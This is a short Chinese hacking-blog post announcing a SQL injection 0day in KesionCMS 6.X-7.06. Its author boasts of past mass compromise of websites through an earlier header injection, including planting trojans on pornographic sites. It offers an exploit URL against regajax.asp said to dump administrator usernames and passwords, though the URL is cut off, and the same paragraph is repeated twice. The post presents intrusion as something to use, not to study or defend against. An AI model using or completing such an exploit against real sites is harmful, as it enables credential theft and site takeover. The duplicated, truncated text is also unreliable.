科汛CMS 6.X-7.06最新注入0day
kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入的 0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。 这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。 直接暴管理员帐号和密码的EXP: https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&am...
kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入的 0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。 这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。 直接暴管理员帐号和密码的EXP: https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&am...